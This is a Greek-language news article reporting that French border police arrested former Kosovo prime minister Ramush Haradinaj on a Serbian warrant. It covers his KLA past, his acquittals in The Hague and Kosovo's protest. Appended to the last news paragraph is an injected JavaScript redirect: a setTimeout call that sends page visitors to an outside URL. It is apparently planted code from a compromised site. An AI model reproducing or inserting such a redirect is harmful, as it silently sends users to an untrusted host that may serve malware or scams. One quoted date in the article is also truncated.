Συνελήφθη στη Γαλλία ο πρώην πρωθυπουργός του Κοσσυφοπεδίου, Ρ. Χαραντινάι

0
12

 

Ο πρώην πρωθυπουργός του Κοσσυφοπεδίου Ραμούς Χαραντινάι, διοικητής του αυτοαποκαλούμενου Απελευθερωτικού Στρατού του Κοσσυφοπεδίου (ΑΣΚ) κατά τον πόλεμο του 1998-1999, συνελήφθη σε γαλλικό έδαφος βάσει εντάλματος της Σερβίας.

Η Σερβία θεωρεί τον Χαραντινάι εγκληματία πολέμου για τον ρόλο του στην εξέγερση ανταρτών στην πρώην νότια περιφέρεια της του Κοσσυφοπεδίου, η οποία ανακήρυξε την ανεξαρτησία της με τη βοήθεια της Δύσης το 2008.

Ο Χαραντινάι υπηρέτησε ως πρωθυπουργός του Κοσσυφοπεδίου μεταξύ του 2004 και του 2005, ενώ η περιοχή ήταν υπό την επίβλεψη των Ηνωμένων Εθνών, προτού δικαστεί και αθωωθεί δύο φορές για εγκλήματα πολέμου από δικαστήριο του ΟΗΕ στη Χάγη.

Το υπουργείο Εξωτερικών του Κοσσυφοπεδίου σε δήλωσή του θεωρεί απαράδεκτο ότι «σταματήθηκε από τις γαλλικές Αρχές βάσει ενός εντάλματος σύλληψης που εκδόθηκε από τη Σερβία το 200», προσθέτοντας ότι κάνει ό,τι είναι δυνατόν για να εξασφαλίσει την απελευθέρωσή του, η οποία, όπως είπε, αναμένεται.

Η συνοριακή αστυνομία της Γαλλίας τον συνέλαβε μόλις έφθασε το αεροδρόμιο της Βασιλείας-Mulhouse στην ανατολική Γαλλία με πτήση από την Πρίστινα, είπαν οι πηγές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here